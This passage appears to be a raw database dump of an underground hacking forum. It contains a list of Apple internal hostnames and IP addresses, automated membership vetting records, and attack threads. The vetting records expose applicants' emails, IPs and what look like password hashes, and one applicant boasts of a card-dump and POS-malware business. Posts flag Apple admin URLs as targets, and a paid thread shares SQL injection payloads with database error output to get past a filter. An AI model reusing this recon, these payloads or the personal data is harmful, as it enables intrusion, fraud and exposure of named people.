nserver.apple.com\n17.254.0.59 nserver2.apple.com\n17.254.0.60 scv-littlebuddy1.apple.com\n17.254.0.64 connect2-java.apple.com\n17.254.0.65 scv-wsidecar.apple.com\n17.254.0.101 devtools.apple.com\n17.254.0.139 velocity.apple.com\n17.254.0.236 vlt-ehla.apple.com\n17.254.1.60 ftp.qtv.apple.com\n17.254.1.175 storedev-gidget.apple.com\n17.254.1.217 idmsa-scv.apple.com\n17.254.2.4 lovington.apple.com\n17.254.2.31 selfservice.apple.com\n17.254.2.53 rsvp.apple.com\n17.254.2.64 daw-scv.apple.com\n17.254.2.69 origin-selfsolve.apple.com\n17.254.2.98 village.apple.com\n17.254.2.116 developerns.apple.com\n17.254.2.117 appleid-scv.apple.com\n17.254.2.129 developerns.apple.com\n17.254.2.131 webgdv.apple.com\n17.254.2.133 scv-ipodrocks.apple.com\n17.254.2.146 vs6-1.apple.com\n17.254.2.147 vs6-2.apple.com\n17.254.2.149 vs7-2.apple.com\n17.254.2.150 origin-helpviewer.apple.com\n17.254.2.156 developerns.apple.com\n17.254.2.157 scv-searchcgi.apple.com\n17.254.2.203 t2valenn.apple.com\n17.254.2.230 itntrvl.apple.com\n17.254.2.240 scv-ssl.apple.com\n17.254.2.249 service.apple.com\n17.254.3.20 dvdsp.apple.com\n17.254.3.38 vs5-2.apple.com\n17.254.3.41 scv-store.apple.com\n17.254.3.42 scv1-store.apple.com\n17.254.3.55 sherlockdevelopert.apple.com\n17.254.3.57 gdv.apple.com\n17.254.3.94 survey2.apple.com\n17.254.3.97 lnx-helpviewer.apple.com\n17.254.3.98 iaprvext.apple.com\n17.254.3.102 veloxs.apple.com\n17.254.3.135 reg.devworld.apple.com\n17.254.3.136 survey.devworld.apple.com\n17.254.3.138 sc5mv.apple.com\n17.254.3.239 quicktimelive.apple.com\n17.254.4.136 www.webdvd.org\n17.254.5.20 vgr.apple.com\n17.254.5.21 vgr001.apple.com\n17.254.5.22 vgr002.apple.com\n17.254.5.23 vgr003.apple.com\n17.254.5.24 vgr004.apple.com\n17.254.5.25 vgr005.apple.com\n17.254.5.26 vgr006.apple.com\n17.254.5.27 vgr007.apple.com\n17.254.5.28 vgr008.apple.com\n17.254.5.29 vgr009.apple.com\n17.254.5.30 vgr010.apple.com\n17.254.5.31 vgr011.apple.com\n17.254.5.32 vgr012.apple.com\n17.254.5.38 vgr-mc001.apple.com\n17.254.5.39 vgr-mc002.apple.com\n17.254.6.18 msbadger-asia-vip.apple.com\n17.254.6.20 badger-vip.apple.com\n17.254.6.36 badger-txnvip.apple.com\n17.254.6.190 msbadger-txnvip.apple.com\n17.254.12.25 adcevents.apple.com\n17.254.12.26 adcinvoice.apple.com\n17.254.12.31 adctv.apple.com\n17.254.12.33 sherlockdeveloper.apple.com\n17.254.12.36 wwdcvolunteers.apple.com\n17.254.12.89 adcsurvey.apple.com\n17.254.13.54 vpnupdate.apple.com\n17.254.15.4 leopardvpnext.apple.com\n17.254.15.6 tigervpn.apple.com\n17.254.15.8 applevpn-tigercc.apple.com\n17.254.15.9 leopardvpn.apple.com\n17.254.15.10 leopardvpn2ext.apple.com\n17.254.15.13 ivpn1.apple.com\n17.254.15.14 ivpn2.apple.com\n17.254.15.20 asavpn.apple.com\n17.254.16.23 privftp.apple.com\n17.254.17.46 nvidia.apple.com\n17.254.17.54 trac.calendarserver.org\n17.254.17.116 coreserverbuild.apple.com\n17.254.17.140 alacsvc.apple.com\n17.254.17.228 qtvr20test.apple.com\n17.254.17.241 onlinetravel.apple.com\n17.254.20.9 edu-vpp-old.apple.com\n17.254.20.13 jobevents.apple.com\n17.254.20.61 enroll.vpp-old.itunes.apple.com\n17.254.20.71 nvidia.apple.com\n17.254.20.78 privp4.apple.com\n17.254.20.135 agents-private.apple.com\n17.254.20.157 volk.macosforge.org\n17.254.20.164 seedsurvey.apple.com\n17.254.20.172 sbv.apple.com\n17.254.20.173 sbv1.apple.com\n17.254.20.174 sbv2.apple.com\n17.254.20.180 qtdevseed.apple.com\n17.254.20.188 vac.apple.com\n17.254.20.211 mdev.apple.com\n17.254.20.212 pdev.apple.com\n17.254.20.215 ical-living-on.apple.com\n17.254.20.228 svn.macosforge.org\n17.254.20.231 volk4.macosforge.org\n17.254.20.239 trac.calendarserver.org\n17.254.20.249 ios-device-checkins.apple.com\n17.254.21.4 sacidev-vpn1.apple.com\n17.254.21.11 poduat-vpn.apple.com\n17.254.21.52 mdev2.apple.com\n17.254.21.56 cl-dev.apple.com\n17.254.21.57 devstats.apple.com\n17.254.21.83 jcmdev.apple.com\n17.254.21.196 sacidev-vpni1.apple.com\n17.254.128.100 vpn-scv.apple.com\n17.254.128.200 vpn-scv-x.apple.com\n17.255.52.55 waves.apple.com\n17.255.77.240 rwavlabserver11.apple.com\n17.255.77.241 rwavlabserver10.apple.com\n17.255.77.242 rwavlabserver9.apple.com\n17.255.77.243 rwavlabserver8.apple.com\n17.255.77.244 rwavlabserver7.apple.com\n17.255.77.245 rwavlabserver6.apple.com\n17.255.77.246 rwavlabserver5.apple.com\n17.255.77.247 rwavlabserver4.apple.com\n17.255.77.248 rwavlabserver3.apple.com\n17.255.77.249 rwavlabserver2.apple.com\n17.255.77.250 rwavlabserver1.apple.com\n17.255.78.236 fodlabserver15.apple.com\n17.255.78.237 fodlabserver14.apple.com\n17.255.78.238 fodlabserver13.apple.com\n17.255.78.239 fodlabserver12.apple.com\n17.255.78.240 fodlabserver11.apple.com\n17.255.78.241 fodlabserver10.apple.com\n17.255.78.242 fodlabserver9.apple.com\n17.255.78.243 fodlabserver8.apple.com\n17.255.78.244 fodlabserver7.apple.com\n17.255.78.245 fodlabserver6.apple.com\n17.255.78.246 fodlabserver5.apple.com\n17.255.78.247 fodlabserver4.apple.com\n17.255.78.248 fodlabserver3.apple.com\n17.255.78.249 fodlabserver2.apple.com\n17.255.78.250 fodlabserver1.apple.com\n17.255.79.239 projectxserve8.apple.com\n17.255.79.240 projectxserve1.apple.com\n17.255.79.241 projectxserve2.apple.com\n17.255.79.242 projectxserve3.apple.com\n17.255.79.243 projectxserve4.apple.com\n17.255.79.244 projectxserve5.apple.com\n17.255.79.245 projectxserve6.apple.com\n17.255.79.246 projectxserve7.apple.com\n17.255.128.50 winsrv.ebc.apple.com\n17.255.128.59 xserve01.ebc.apple.com\n17.255.128.60 xserve01-lom.ebc.apple.com\n17.255.128.61 xserve02.ebc.apple.com\n17.255.128.62 xserve02-lom.ebc.apple.com\n17.255.128.63 xserve03.ebc.apple.com\n17.255.128.64 xserve03-lom.ebc.apple.com\n17.255.128.65 xserve04.ebc.apple.com\n17.255.128.66 xserve04-lom.ebc.apple.com\n17.255.128.67 xserve05.ebc.apple.com\n17.255.128.68 xserve05-lom.ebc.apple.com\n17.255.128.71 jhr-atv.ebc.apple.com\n17.255.128.72 jhr-savant.ebc.apple.com\n17.255.128.76 jgr-atv.ebc.apple.com\n17.255.128.77 jgr-savant.ebc.apple.com\n17.255.128.81 mlk-atv.ebc.apple.com\n17.255.128.82 mlk-savant.ebc.apple.com\n17.255.216.51 cvs.opensource.apple.com\n[/LIST]\n\n [/code]', 1, 0, '', 0, 1, 0, 0, 0),
(1943, 1659, 0, 'Invite', 2, '{$name}', 1410025941, '[SIZE=\'4\'][COLOR=\'Sienna\']n33tlix[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: akarta315h@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 196.45.24.55\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1944, 1660, 0, 'Invite', 2, '{$name}', 1410029704, '[SIZE=\'4\'][COLOR=\'Sienna\']jaxtell3r[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: jaxtell3r@exploit.im\n[b]e-mail[/b]: jaxtell3r@zmail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 98.248.237.33\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.resellerratings.com/user/jaxtell3 | http://www.resellerratings.com/user/jaxtell3 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1945, 1661, 0, 'Invite', 2, '{$name}', 1410036730, '[SIZE=\'4\'][COLOR=\'Sienna\']Mouse[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: papamouse@is-a-furry.org\n[b]e-mail[/b]: papamouse@mail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 99.194.25.204\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : mouse : miki-mouse@mail.ru : 85.30.195.64 : 0751948b95566f2ff61fc7532e11f5c6\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://mouse.org | mouse.org \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1946, 1658, 1942, 'w0rm', 1, '', 1410041057, '_ttps://trainingadmin.apple.com/plateau/user/selfRegisterInit.do', 1, 0, '', 0, 1, 0, 0, 0),
(1948, 1662, 0, 'Invite', 2, '{$name}', 1410055038, '[SIZE=\'4\'][COLOR=\'Sienna\']Davenjah[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: admin@davenjah.su\n[b]e-mail[/b]: admin@davenjah.su\n[b]Info[/b]: more than 10 years in Dumps/CC business. having shops and POS malwares.\r\n\r\n@Davenjah.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 195.154.171.5\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://newsaboutfrauds.blogspot.com/2008_08_01_archive.html | http://newsaboutfrauds.blogspot.com/2008_08_01_archive.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1949, 1658, 1942, 'w0rm', 1, '', 1410055888, '[url]https://trainingadmin.apple.com/jbossws/[/url]', 1, 0, '', 0, 1, 0, 0, 0),
(1950, 1663, 0, 'Invite', 2, '{$name}', 1410060418, '[SIZE=\'4\'][COLOR=\'Sienna\']d4rk0ding[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: d4rk0ding@exploit.im\n[b]e-mail[/b]: d4rk0ding@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 75.156.90.71\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36 OPR/24.0.1558.53 (Edition Campaign 51)\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://underc0de.org/foro/profile/d4rk0ding/?area...;sa... | http://underc0de.org/foro/profile/d4rk0ding/?area...;sa... \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1951, 1664, 0, 'Invite', 2, '{$name}', 1410077195, '[SIZE=\'4\'][COLOR=\'Sienna\']Soek[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 686397005\n[b]e-mail[/b]: theworldhack@secure-mail.biz\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 86.57.180.46\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/537.16 (KHTML, like Gecko) Version/5.0 Safari/537.16\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/JuliaSoek | https://twitter.com/JuliaSoek \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1952, 1665, 0, 'Invite', 2, '{$name}', 1410099913, '[SIZE=\'4\'][COLOR=\'Sienna\']altukhov[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: altukhov@jabber.at\n[b]e-mail[/b]: kotak4amal@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 36.81.124.94\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.panoramio.com/user/4605112 | http://www.panoramio.com/user/4605112 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1953, 1666, 0, 'lumbricus', 39, 'MVC -SQLi - 3 BTC', 1410165986, 'Need help bypass: \r\n\r\nPOST: \r\n\r\n[CODE]Parabol=2&MagicVar=91\'[/CODE]\r\n\r\n\r\nERROR: \r\n\r\n[HTML]{\"Message\":\"Conversion failed when converting the varchar value \\u002791\\u0027\\u0027 to data type int.\",\"StackTrace\":\" at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\\r\\n at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)\\r\\n at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean\\u0026 dataReady)\\r\\n at System.Data.SqlClient.SqlCommand.FinishExecuteReader(SqlDataReader ds, RunBehavior runBehavior, String resetOptionsString)\\r\\n at System.Data.SqlClient.SqlCommand.RunExecuteReaderTds(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, Boolean async, Int32 timeout, Task\\u0026 task, Boolean asyncWrite, SqlDataReader ds)\\r\\n at System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method, TaskCompletionSource`1 completion, Int32 timeout, Task\\u0026 task, Boolean asyncWrite)\\r\\n at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(TaskCompletionSource`1 completion, String methodName, Boolean sendToPipe, Int32 timeout, Boolean asyncWrite)\\r\\n at System.Data.SqlClient.SqlCommand.ExecuteNonQuery()\\r\\n at StackExchange.Profiling.Data.ProfiledDbCommand.ExecuteNonQuery()\\r\\n at Dapper.SqlMapper.ExecuteCommand(IDbConnection cnn, IDbTransaction transaction, String sql, Action`2 paramReader, Object obj, Nullable`1 commandTimeout, Nullable`1 commandType) in c:\\\\Dev\\\\Dapper\\\\Dapper\\\\SqlMapper.cs:line 1624\\r\\n at Dapper.SqlMapper.Execute(IDbConnection cnn, String sql, Object param, IDbTransaction transaction, Nullable`1 commandTimeout, Nullable`1 commandType) in e:\\\\zbotpanel\\\\Dapper\\\\Dapper\\\\SqlMapper.cs:line 707\\r\\n at zbotpanel.Data.Dapper.BaseDapperRepository.RunNonQuery(QueryType queryType, String command, Object parameters, DbTransaction transaction) in g:\\\\src\\\\trunk\\\\Data.Dapper\\\\BaseDapperRepository.cs:line 194\\r\\n at zbotpanel.Core.Data.Repository.CustProfileRepository.Save_Genres(Int32 custProfileID, String genreIDs)\\r\\n at Services.UserAccount.Domain.UserAccountRepository.SaveGenres(Int32 value, String genreIDs) in g:\\\\src\\\\trunk\\\\Services.UserAccount\\\\Domain\\\\UserAccountRepository.cs:line 109\\r\\n at Services.UserAccount.Domain.AccountAuthorisation.UsersService.SetUserPreferences(Int32 customerProfileId, Int32 preferenceState, String genreIDs, Nullable`1 visitorLocationId) in g:\\\\src\\\\trunk\\\\Services.UserAccount\\\\Domain\\\\AccountAuthorisation\\\\UsersService.cs:line 689\\r\\n at Services.UserAccount.Controllers.UsersAccountController.LocationGenrePreferences(VisitorInfo visitorInfo, LocationGenreModel preferences) in g:\\\\src\\\\trunk\\\\Services.UserAccount\\\\Controllers\\\\UsersAccountController.cs:line 231\\r\\n at lambda_method(Closure , ControllerBase , Object[] )\\r\\n at System.Web.Mvc.ReflectedActionDescriptor.Execute(ControllerContext controllerContext, IDictionary`2 parameters)\\r\\n at System.Web.Mvc.ControllerActionInvoker.InvokeActionMethod(ControllerContext controllerContext, ActionDescriptor actionDescriptor, IDictionary`2 parameters)\\r\\n at System.Web.Mvc.Async.AsyncControllerActionInvoker.\\u003c\\u003ec__DisplayClass42.\\u003cBeginInvokeSynchronousActionMethod\\u003eb__41()\\r\\n at System.Web.Mvc.Async.AsyncControllerActionInvoker.\\u003c\\u003ec__DisplayClass37.\\u003c\\u003ec__DisplayClass39.\\u003cBeginInvokeActionMethodWithFilters\\u003eb__33()\\r\\n at System.Web.Mvc.Async.AsyncControllerActionInvoker.\\u003c\\u003ec__DisplayClass4f.\\u003cInvokeActionMethodFilterAsynchronously\\u003eb__49()\"}[/HTML]', 1, 0, '', 0, 1, 0, 0, 0),
(1954, 1666, 1953, 'lumbricus', 39, '', 1410167060, 'Interesting:\n\n[CODE]Parabol=2&MagicVar=-2[/CODE]\n\n\nERROR: \n\n[CODE]The INSERT statement conflicted with the FOREIGN KEY constraint \\\"FK_zbotProfile2\\\". The conflict occurred in database \\\"zBotDB\\\", table \\\"dbo.Type\\\", column \\u0027TypeID\\u0027.\\r\\nThe statement has been terminated.[/CODE]', 1, 0, '', 0, 1, 0, 0, 0),
(1957, 1667, 0, 'Invite', 2, '{$name}', 1410185271, '[SIZE=\'4\'][COLOR=\'Sienna\']Arnold[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: a-rnold@default.rs\n[b]e-mail[/b]: incognito.pulse5000@gmail.com\n[b]Info[/b]: Hello, let me introduce my self, got skill in coding. Doing swf\'s. Also im selling traffic.\r\nMy other accounts:\r\nDK- https://darkode.com/profile.php?mode=viewprofile&u=1627\r\nExploit- https://exploit.in/forum/index.php?showuser=54732\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 108.59.13.44\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/33.1.0.0 Chrome/33.0.1750.152 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://arnold.af.mil | arnold.af.mil \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1959, 1668, 0, 'Invite', 2, '{$name}', 1410205047, '[SIZE=\'4\'][COLOR=\'Sienna\']Mruoss[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: mauisanell@outlook.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 174.127.99.214\n[*][b]real ip[/b]: 174.127.99.214\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://design.cmu.edu/user/852 | http://design.cmu.edu/user/852 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1960, 1666, 1953, 'ropertus', 33, '', 1410209742, 'I can help you with this. PM me or jabber.', 1, 1, '', 0, 1, 0, 0, 0),
(1961, 1669, 0, 'Invite', 2, '{$name}', 1410209872, '[SIZE=\'4\'][COLOR=\'Sienna\']towel[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 634665240\n[b]e-mail[/b]: towel@i2pmail.org\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 193.150.121.66\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : towel : pwn3rr@gmail.com : 24.126.46.154 : 49f3632cb51c72332fc73d1245e5b2b7\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
